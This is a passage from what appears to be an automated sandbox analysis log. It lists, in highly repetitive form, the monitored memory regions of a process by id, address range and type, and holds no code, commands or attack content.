= 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14133 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14134 start_va = 0x1ec0000 end_va = 0x1ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ec0000" filename = "" Region: id = 14135 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 14136 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14137 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14138 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14139 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14140 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14141 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14142 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14143 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14144 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14145 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14146 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14147 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14148 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14149 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14150 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14151 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14152 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14153 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14154 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14155 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14156 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14157 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14158 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14159 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14160 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14161 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14162 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14163 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14164 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14165 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14166 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14167 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14168 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14169 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14170 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14171 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14172 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14173 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14174 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14175 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14176 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14177 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14178 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14179 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14180 start_va = 0x1ec0000 end_va = 0x1ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ec0000" filename = "" Region: id = 14181 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 14182 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14183 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14184 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14185 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14186 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14187 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14188 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14189 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14190 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14191 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14192 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14193 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14194 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14195 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14196 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14197 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14198 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14199 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14200 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14201 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14202 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14203 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14204 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14205 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14206 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14207 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14208 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14209 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14210 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 14211 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 14212 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14213 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14214 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 14215 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 14216 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14217 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14218 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14219 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14220 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14221 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14222 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14223 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14224 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14225 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14226 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14227 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14228 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14229 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14230 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 14231 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 14232 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14233 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14234 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14235 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14236 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14237 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14238 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14239 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14240 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14241 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14242 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14243 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14244 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14245 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14246 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14247 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14248 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14249 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14250 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14251 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14252 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14253 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14254 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14255 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14256 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14257 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14258 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14259 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14260 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14261 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14262 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14263 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14264 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14265 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14266 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14267 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14268 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14269 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14270 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14271 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14272 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14273 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14274 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14275 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14276 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14277 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14278 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14279 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14280 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14281 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14282 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14283 start_va = 0x1ec0000 end_va = 0x1ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ec0000" filename = "" Region: id = 14284 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 14285 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14286 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14287 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14288 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14289 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14290 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14291 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14292 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14293 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14294 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14295 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14296 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14297 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14298 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14299 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14300 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14301 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14302 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14303 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14304 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14305 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14306 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14307 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14308 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14309 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14310 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14311 start_va = 0x1e80000 